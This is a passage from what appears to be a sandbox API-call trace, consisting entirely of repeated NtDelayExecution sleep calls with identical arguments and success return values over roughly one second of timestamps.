(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.237] NtDelayExecution 